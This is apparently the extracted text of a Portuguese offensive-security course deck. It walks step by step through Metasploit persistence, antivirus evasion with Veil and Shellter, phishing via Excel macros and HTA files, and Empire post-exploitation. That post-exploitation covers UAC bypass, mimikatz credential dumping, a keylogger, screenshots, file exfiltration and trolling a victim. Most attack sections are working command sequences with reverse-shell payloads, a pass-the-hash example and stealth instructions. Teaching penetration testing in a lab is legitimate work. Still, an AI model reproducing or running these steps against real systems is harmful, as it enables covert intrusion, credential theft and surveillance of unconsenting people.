Exercicio 15 (persistência)
use exploit/windows/local/persistence
set STARTUP SYSTEM
set SESSION <NUMERO DA SUA SESSÃO DA INVASÃO>
set payload windows/meterpreter/reverse_https
set LHOST <IP DO KALI>
set LPORT 443
exploit
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 16 (Exploração completa)
1 – Comprometer o alvo com alguma técnica que você aprendeu.
(Lembre-se de que você não pode ser detectado, seja discreto e use um payload de conexão reversa que seja criptografado e não chame a atenção)
7 – Ativar persistência.
8 – Ativar Keylogger.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 16 (Exploração completa)
12 – Verificar se a persistência funcionou após o computador ser reiniciado.
14 – Acessar o alvo através de RDP usando o usuário hacker e em seguida fechar a sessão RDP.
Agora você pode voltar ao alvo quando quiser e de diferentes formas. Matenha o alvo monitorado.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Bypass Antivirus
VEIL
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion – Introducão
O Veil-Evasion (https://www.github.com/Veil-
Framework/Veil-Evasion/) é uma ferramenta
para gerar arquivos executáveis de um
payload com o objeto de não ser detectado
por soluções de antivírus. O Veil gerará
payloads aleatórios e únicos, podemos comparar
estes payloads a malwares polymorphic que
mudam quando se movem de um host para o
outro, dando a eles a vantagem sobre as solucoes
antimalware tradicionais baseados em assinaturas,
como a maioria dos antivirus.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion – Linguagens dos Payloads
C C# GO Perl
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion – Tipos dos Payloads
shellcode_inject/virtual
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion – Gerando o Payload
• Configura as opções necessárias para o payload (set LHOST <IP LOCAL> | set LPORT <PORTA DO HOST LOCAL>
set
• Gera o payload
generate
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion - Gerando o Payload
Exemplo:
[menu>>]: list
[menu>>]: info 32
[menu>>]: use 32
[python/meterpreter/rev_https>>]: options
[python/meterpreter/rev_https>>]: set LHOST 10.0.0.200
[i] LHOST => 10.0.0.200
[python/meterpreter/rev_https>>]: set LPORT 443
[i] LPORT => 443
[python/meterpreter/rev_https>>]: generate
[>] Please enter the base name for output files (default is 'payload'): payload_python
[>] Please enter the number of your choice: 2
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion - Gerando o Payload
Resultado final:
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion – Command Line
Através de linha de compando será possível criar payloads, assim como os criados pelos
msfvenon.
-p = selecionar o payload
-c = informar as opções de configuração do payload
-o = arquivo de saída para o fonte e binários compilados.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Veil-Evasion – Exploração
• Gero payload através de linha de comando ou menu do VEIL
Gerar Payload
• Envio e executo o payload no alvo usando técnicas como engenharia social ou psexec.
Enviar e executar
payload no alvo
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Bypass Antivirus
Shellter
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Shellter – Introducão
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Shellter – Introducão
O Shellter é uma ferramenta para a injeção de shellcode de forma dinâmica, sendo um PE infector (etenda
PE como um Portable Executable – arquivo executável portátil) dinâmico. Ele pode ser usada para injetar
shellcode em aplicações Windows (somente 32-bit). O shellcode pode ser algo seu ou algo gerado através
de um framework como o Metasploit.
O Shellter tira vantagem da estrutura atual de um arquivo PE e não aplica qualquer modificação que mudará
a permissão como de alteração em permissões de acesso em seções da memória
(a menos que o usuário precise), adicionando uma seção estra com acesso RWE.
O Shellter não é apenas um infector EPO que tenta encontrar um local para inserir uma instrução para
redirecionar a execução para o payload. Ao contrário de outros infectors, o engine avançado de infecção do
Shellter, nunca transfere o fluxo de execução para um code cave ou para uma secão adicionada no arquivo
PE infectado.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Shellter – Exploração
• Verifico se o meu PE é adquado e não é reconhecido por fornecedores de antivírus.
Seleciono o meu
PE
• Envio e executo o payload no alvo usando técnicas como engenharia social ou psexec.
Enviar e executar
payload no alvo
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 17 – Instalação do Veil Framework
Quando for exibido a tela de instalação do Python e outras ferramentas,realizar a instalação usando as opções padrões (NEXT -> NEXT
-> FINISH)
Se tiver problemas no acesso do Veil-Evasion delete o seu perfil do wine e execute o setup do Veil-Evasion.
rm -rf ~/.wine/
/root/Tools/03_Exploitation/Veil/Veil-Evasion/setup/setup.sh
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 18 – Geração de payloads
1 – Inicie o Veil-Evasion
cd ~
cd Tools/Veil/Veil-Evasion
./Veil-Evasion.py
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 18 – Geração de payloads
6 – Configurar as informações necessárias do payload.
set LHOST <IP DO SEU LINUX>
set LPORT 443
set USE_PYHERION Y (Fará a criptografia no payload)
7 - Gerar o payload.
generate
Quando for solicitado o nome do payload, informe: python_payload
Quando percuntado sobre como você deseja criar o seu payload, selecione: 2 – Pwnstaller (Compilará o payload evitando o DEP do Windows)
7 - Copiar o payload para o alvo e solicitar que seja efetuada a varredura do antivírus no payload copiado.
10 – Repita o exercício usando os payloads a seguir e compare o tamanho entre os arquivos de payload gerados.
• go/meterpreter/rev_https;
• cs/meterpreter/rev_https
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 19 – Veil + Shellcode
1 – Selecione o payload go/shellcode_inject/virtual
use go/shellcode_inject/virtual
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 20 – Veil CLI
1 – Abra o shell de sua distribuição Linux (terminal).
-p = selecionar o payload
-c = informar as opções de configuração do payload
-o = arquivo de saída para o fonte e binários compilados.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 21 – Gerando Macros
1 – Selecione o payload powershell/meterpreter/rev_https
[menu>>]: use 23
2 – Configure o payload
[powershell/meterpreter/rev_https>>]: set LHOST 10.0.0.200
[powershell/meterpreter/rev_https>>]: set LPORT 443
[powershell/meterpreter/rev_https>>]: generate
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 21 – Gerando Macros
Este arquivo poderá ser adicionado como macro em aplicativos do Microsoft Office como Word ou Excel.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 22 – Veil e PSEXEC
(Movimentação Lateral)
2 – Ative o multi/handler no msfconsole para receber a conexão do payload que você gerou.
3 – Envie o payload para o alvo através do PSEXEC, usando a técnica de PtH (Pass the Hash)
Exemplo:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 administrator@10.0.0.100 cmd.exe -c
payload.exe
Ou
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 23 – Instalação do Shellter
1 – Abra o shell do KALI (terminal) e seguir as instruções abaixo.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 24 – Infeção de PE
1 – Realize do download do arquivo putty.exe no KALI através do site https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
3 – Inicie o Shellter.
shellter
6 – Em ”Enable Stealth Mode” digite a opção Y para garantir que as funções de seu arquivo executável sejam preservadas.
11 – Após o términio de infecção, será exibido uma mensagem solicitando que pressione a tecla ENTER. Após pressionar a tecla
solicitada o shellter será finalizado.
12 – Abra o msfconsole e ative o exploit multi/handler com as mesmas configuracoes de payload, lhost e lport utilizadas no shellter.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Conquistando com
EMPIRE
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
PowerShell
Windows PowerShell é um shell de linha de comandos desenvolvido pela Microsoft,
com o propósito de automatizar tarefas e gerenciar configurações do sistema
operacional. O PowerShell providencia um accesso a diversas bibliotecas do Microsoft
Windows, permitindo com que administradores automatizem tarefas administrativas
locais ou remotas.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
PowerShell
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
PowerShell
Malwares
Malware Vawtrack
Tarefas comuns de um malware:
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
PowerShell
Segurança Ofensiva
Existem diversas ferramentas com foco em segurança ofensiva que usam todo o poder do Microsoft
Powershell para comprometer um sistema operacional Microsoft Windows.
• Powersploit (https://github.com/mattifestation/PowerSploit);
• Nishang (https://github.com/samratashok/nishang);
• Veil Power Tools (https://github.com/PowerShellEmpire/PowerTools).
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Empire
Empire é uma agente de pós-exploração que utiliza PowerShell
com uma arquitetura flexível e comunicação criptografada.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Empire
Arquitetura
Composto por:
• Listeners;
• Stagers;
• Agents.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Empire
Arquitetura - Listener
Funções interessantes:
• Kill dates e Working Hours;
• Foreign listeners;
• White e Black lists de IP.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Empire
Arquitetura - Stager
Formatos:
• dll;
• hop_php;
• launcher;
• launcher_vbs;
• launcher_bat;
• pth_wmis;
• war;
• ducky;
• hta;
• macro.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Empire
Arquitetura – Agents - Módulos
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Empire
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Fases de um ataque
Preparação Recon
Post Exploitation
Configuração do C2
D
Configuração
Scanning Exploração Consciência Exfiltration Clean up Deception
de
Situacional Persistência
A
C Escalação de
B
Privilégio
Movimentação
Lateral
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
DEMO
Uso do Empire nas fases de um ataque.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 25 - Estudo de Caso
Seu objetivo será comprometer um computador alvo através de uma campanha de phishing.
Após comprometer o computador alvo você terá que realizar as seguintes tarefas:
- Criar um mecanismo de persitência;
- Manter o computador alvo sendo monitorado;
- Coletar informações como senhas e arquivos confidenciais;
- Trollar o alvo;
- Realizar a movimentação lateral (opcional).
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Preparação
Instalação do Empire
4 – Instalar o Empirec
/gitrepos$ cd Empire/setup/
/gitrepos/Empire$ ./install.sh
5 – Executar o Empire com permissões administrativas e confirmar se a instalação foi bem sucedida.
/gitrepos/Empire$ ./empire
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Preparação
Ativação do listener
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Preparação
Ativação do listener
6 – Configurar o nome do listener.
(Empire: listeners) > set Name PhishingCampaign
7 – Confirmar se as configurações do listener estão corretas, conforme solicitado nos exercícios anteriores.
(Empire: listeners) > info
8 – Ativar o listener.
(Empire: listeners) > execute
Se tudo deu certo, você receberá como retorno a informação similar a figura a seguir.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack - Macro
Objetivo: Realizar a exploração do alvo através de um ataque client side utilizando uma planilha EXCEL com macro.
cat /tmp/macro
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack - Macro
5 – Abrir o Microsoft Excel 2013, clique no menu View, no botão Macros e no submenu View Macros.
Será aberta a caixa de Macro, digite a palavra pwned em Macro name e clique no botão Create, conforme demonstrado na imagem a
seguir.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack - Macro
6 – Será aberta a tela do Visual Basic for Applications. Delete todo o conteúdo existente e cole o conteúdo copiado do arquivo de macro
gerado pelo agente do EMPIRE.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack - Macro
7 – Salve o documento como um nome “chamativo” como Cargos_Salarios_2015, selecionando o tipo do arquivo como “Excel 97-2003
Workbook (*.xls)”.
* No seu caso bastará copiar o arquivo gerado para o DESKTOP do usuário BOB na sua máquina virtual com o Microsoft Windows 7 que
será explorada durante os exercícios. Em uma condição real o usuário alvo poderá receber o arquivo por e-mail, através de um link de
download ou através de uma acesso a um compartilhamento de rede existente.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack - Macro
9 – Abrir o arquivo gerado no alvo com o usuário BOB. Clicar no botão “Enable Content” ativando o macro. Neste instante o
computador alvo será comprometido.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack – HTA file
Objetivo: Realizar a exploração do alvo através de um ataque client side utilizando um arquivo HTA.
cat /tmp/relatorio.hta
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack – HTA file
Abra uma nova janela do terminal e nesta nova janela digite os comandos a seguir:
cd /tmp
python –m SimpleHTTPServer 8080
6 – Utilizando o usuário BOB, abra o internet explorer e acesse o arquivo relatório.hta através do endereço do WebServer criado
http://192.168.16.10:8080/relatorio.hta.
7 – Na caixa de diálogo que será exibida informe que você deseja abrir o arquivo relatório.hta e clique em seguida no botão permitir da
caixa de segurança do Internet Explorer.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client side attack – HTA file
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Consciência Situacional
Sem privilégios administrativos
Objetivo: Obter a consciência situacional para realizar ações mais efetivas no alvo.
2 – Preencher a tabela a seguir com as informações obtidas. Anotar outras informações que entenda ser importante para o processo de
exploração e refletir em como as informações obtidas podem ser utilizadas contra o alvo.
hostname IP IP DNS DNS Sistema Antivírus
Interno Externo Primário Secundário Operacional
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Persistência
Sem privilégios administrativos
Objetivo: Criar uma estrutura para manter a conexão permanente com o alvo.
1 – Criar persistência para que o computador alvo se conecte ao EMPIRE sempre que for reiniciado.
(Empire: pwned_02) > usemodule persistence/userland/registry
(Empire: persistence/userland/registry) > set Listener PhishingCampaign
(Empire: persistence/userland/registry) > execute
(Empire: persistence/userland/registry) > back
2 – Criar persistência para que o computador alvo se conecte de 15 em 15 minutos ao EMPIRE sempre que uma sessão for encerrada,
escondendo o script em um ADS (Alternet Data Stream).
(Empire: pwned_02) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > set Listener PhishingCampaign
(Empire: persistence/userland/schtasks) > set IdleTime 15
(Empire: persistence/userland/schtasks) > set ADSPath C:\Users\Bob\AppData\Local\Microsoft\Windows\Appdata:script.txt
(Empire: persistence/userland/schtasks) > execute
(Empire: persistence/userland/schtasks) > back
3 – Reinicie o computador alvo e realize o logon com o usuário Bob. Verifique se uma nova conexão foi gerada com o EMPIRE após o
logon.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Escalação de Privilégio
1 – Interagir com o novo agente gerado, após reiniciar o computador alvo para testar a persistência.
(Empire: stager/macro) > agents
(Empire: agents) > interact <name>
Exemplo: (Empire: agents) > interact ULVXEXAHYKSFBD4H
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Escalação de Privilégio
Será criado um novo agente com a proteção de UAC (User Account Control) do Windows desativada.
Note que ao lado do Username existe um “*” no novo agente, representando um processo de integridade alta para esta sessão.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Escalação de Privilégio
Caso você tenha problema, pode roubar um token de SYSTEM para obter o privilégio de SISTEMA.
(Empire: pwned02_new_ bypassuac) > steal_token 516 (onde 516 é o PID do processo lsass.exe)
Caso nenhuma das recomendações funcione, utilize o comando getsystem do EMPIRE a partir da versão 1.5.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Escalação de Privilégio
9 – Será criada uma nova sessão com privilégio de SYSTEM. Interagir e renomear a sessão.
(Empire: management/psinject) > agents
Agora você possui acesso a uma sessão com controle total do computador alvo.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Persistência
Privilegiada
Objetivo: Criar uma estrutura para manter a conexão permanente com o alvo mantendo as permissões privilegiadas
obtidas.
3 - Acessar o computador alvo através RDP. Na tela de login pressionar a tecla SHIFT 5 vezes para exibir o shell do Windows com acesso
privilegiado de SYSTEM.
Pressionar a tecla SHIFT 5 vezes após abrir a conexão através de RDP com o computador alvo.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Persistência
Privilegiada
5 – Reiniciar o computador alvo e observer se após 5 minutos que o computador alvo for iniciado será aberta uma nova sessão com
privilégios de SYSTEM. NÃO É NECESSÁRIO LOGAR NO COMPUTADOR ALVO.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Consciência Situacional
Privilegiada
Objetivo: Obter a consciência situacional privilegiada para realizar ações mais efetivas no alvo.
3 – Explore outras funções do módulo de consciência situacional e obtenha informações que sejam úteis para a sua exploração.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Senhas
Objetivo: Obter as senhas e representações de senhas (hash) utilizados no computador alvo. As senhas poderão ser
utilizadas para o processo de movimentação lateral.
1 - Interagir com o agente pwned02_p_system e confirmar se o processo que você está utilizando no agente é o lsass.exe
(Empire: pwned02_p_system) > sysinfo
Caso não seja, crie uma nova sessão que utilize o processo lsass.exe com os privilégios de SYSTEM.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Senhas
2 – Obter as senhas em cleartext e as representações das senhas (hashes) expostas em memória através do mimikatz.
(Empire: credentials/mimikatz/lsadump) > usemodule credentials/mimikatz/logonpasswords
(Empire: credentials/mimikatz/logonpasswords) > execute
(Empire: credentials/mimikatz/logonpasswords) > back
Caso não funcione será necessário realizar o downgrade do wcdigest e bloquear a tela do computador alvo se o mesmo utilizar o
Microsoft Windows 8.1 ou reiniciar o computador alvo se o mesmo utilizar o Windows 10.
(Empire: credentials/mimikatz/lsadump) > usemodule management/wdigest_downgrade
(Empire: management/wdigest_downgrade) > execute
Repetir o passo 2 após o usuário alvo desbloquear a tela ou logar no computador alvo.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Senhas
4 – Obter as senhas em cleartext do Vault do Windows (senhas armazenadas no Internet Explorer, Outlook e outros programas
clientes).
(Empire: pwned02_p_system) > usemodule credentials/vault_credential
(Empire: credentials/vault_credential) > execute
(Empire: credentials/vault_credential) > back
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Monitoramento
Objetivo: Monitorar o computador alvo para identificar informações valiosas e informações que poderão ser
utilizadas em outras fases do ataque.
1 – Migre o seu processo para o processo do contexto do usuário (explorer.exe) que será monitorado.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Monitoramento
2 – Ativar o Keylogger.
(Empire: pwned02_explorer) > usemodule collection/keylogger
(Empire: collection/keylogger) > execute
Abrir o bloco de notas no computador alvo e digitar algo para confirmar o funcionamento do keylogger.
Selecionar (CTR+A) e copiar (CTR+C) o conteúdo do texto digitado no bloco de dados para confirmar o funcionamento do
clipboard_monitor.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Monitoramento
4 – Realizar um Screenshot do computador alvo.
(Empire: collection/clipboard_monitor) > usemodule collection/screenshot
(Empire: collection/screenshot) > execute
Acesse algum site que precisa de senha, ou algum aplicativo que solicita senha através do uso de rede e confirme se a captura é
realizada.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Arquivos
1 – Criar arquivo texto com o nome Confidencial no desktop do usuário do computador alvo. Abrir o arquivo e digitar a palavra senha.
Salvar e fechar o arquivo.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Arquivos
Se tudo deu certo, o arquivo será salvo em um caminho similar ao apresentado a seguir.
/downloads/pwned03_explorer/C:/Users/Bob/Desktop/confidencial.txt
Visualize o conteúdo do arquivo abrindo um novo shell (terminal) e digitando o comando apresentado a seguir.
cat /downloads/pwned03_explorer/C:/Users/Bob/Desktop/confidencial.txt
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Integrando com o Metasploit
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Integrando com o Metasploit
3 – Realizar o injection .
(Empire: listeners) > injectshellcode meterpreter <PID DE ALGUM PROCESSO – PREFERENCIA SYSTEM>
Exemplo: (Empire: listeners) > injectshellcode meterpreter 516
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Hacking for fun
PARA FINALIZAR
02 - Enviar a música thunderstruck para o computador alvo. O alvo não conseguirá desativar o som ou reduzir o volume.
(Empire: trollsploit/voicetroll) > usemodule trollsploit/thunderstruck
(Empire: trollsploit/thunderstruck) > execute
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Man in the Middle
(MITM)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Introducão
Um ataque man-in-the-middle (MITM) é um tipo de ataque cibernético onde um ator malicioso se insere na
conversa entre duas partes. Ao se inserir nesta conversar o ator malicioso consegue representar ambas as partes e
obter acesso a informação que ambas as partes enviam e recebem entre si.
Neste tipo de ataque o ator malicioso poderá interceptar, enviar, receber e modificar os dados direcionados entre as
partes sem o conhecimento dos mesmas.
O ataque MITM explora em tempo real conversas, transações e transferências de dados entre as partes.
Atualmente, não há uma única tecnologia ou configuração para impedir todos os ataques MITM. No entanto,
aumentando a complexidade com múltiplas camadas de defesa aumentará o custo para o invasor. Aumento do custo
do atacante no tempo, esforço ou dinheiro pode ser um dissuasor eficaz para evitar o comprometimento da rede.
Geralmente, criptografia e certificados digitais proporcionam uma proteção eficaz contra ataques MITM,
assegurando tanto a confidencialidade e integridade das comunicações.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Cenários
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Técnicas
ARP DNS STP Port
LOCAL WPAD
Poisoning Spoofing Mangling Stealing
Remoto
DNS Traffic Route
Poisoning Tunneling Mangling
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – Arp poisoning
Na comunicação normal ARP, o PC host irá enviar um pacote que tem o endereço IP de origem e destino dentro do
pacote e irá transmiti-lo a todos os dispositivos conectados à rede. O dispositivo que possui o endereço IP de destino
enviará a resposta ARP com o seu endereço MAC na mesma e, em seguida, a comunicação ocorre.
O protocolo ARP não é um protocolo seguro e o cache ARP não tem um mecanismo à prova de falhas. O pacote de
resposta ARP pode ser facilmente falsificado e pode ser enviado para a máquina que enviou o pedido ARP sem saber
que esta não é a máquina real, mas um ataque para causar violações de dados. Isso acontece porque a tabela de
cache ARP será atualizada conforme decidido pelo atacante e por isso todo o tráfego de rede pode ser direcionado
para o atacante, fazendo com que o atacante possui toda a informação trafegada. O pedido e respostas ARP não
requerem qualquer tipo de autenticação ou verificação uma vez que todos os hosts da rede irão confiar nas
respostas ARP.
Em envenenamento de cache ARP, o atacante captura o trafego da rede, podendo monitorar o tráfego de rede e
falsificar os pacotes ARP entre o hospedeiro e o computador de destino e executar o ataque MIM.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – ICMP Redirect
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – DNS Spoofing
Se o atacante é capaz de farejar o ID do pedido DNS, ele / ela pode responder antes que o servidor DNS reais.
Sempre que entramos em um website em nosso PC é enviado uma requisição para resolução de nomes para o
servidor de DNS e em seguida recebemos uma mensagem de resposta do servidor de DNS na resposta. Este pedido
DNS e resposta são mapeados em conjunto com um número de identificação único. Se o atacante se apodera do
número de identificação único, em seguida, disfarçando a vítima com um pacote corrupto que contém o número de
identificação do ataque pode ser lançado. O atacante redireciona a vítima para o site falso através da realização de
envenenamento de cache ARP para desviar a mensagem de solicitação DNS para o qual o pacote de resposta falso é
enviado.O computador host deseja se conectar a um site para que ele irá enviar um pedido de consulta DNS para o
servidor DNS, mas devido ao ataque MIM o atacante irá interceptar esta consulta DNS e enviar uma resposta DNS
falso para o PC host. O PC host não viria a saber se a resposta é legítimo ou não e ele vai começar a se comunicar
com o site malicioso do atacante que faz com que as violações de dados.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MITM – WPAD
Quando o Internet Explorer está configurado para "Detectar automaticamente as configurações" será requisitado na
rede por um host chamada WPAD. Para que o WPAD funcione deverá existir uma entrada no DNS para o WPAD
apontado para um servidor proxy que possua o arquivo wpad.dat, que falará para o Internet Explorer o que ele
deverá utilizar para direcionar o tráfego de Internet.
Se esta consulta ao DNS falha, o cliente irá usar o WINS, e finalmente fará um broadcast local para tentar encontrar o
host chamado WPAD na rede. Em sistemas operacionais a partir do Windows Vista esta requisição é baseada em um
protocolo chamado Link-local Multi-cast Name Resolution(LLMNR). O LLMNR can be seen as a mix between NBT-NS
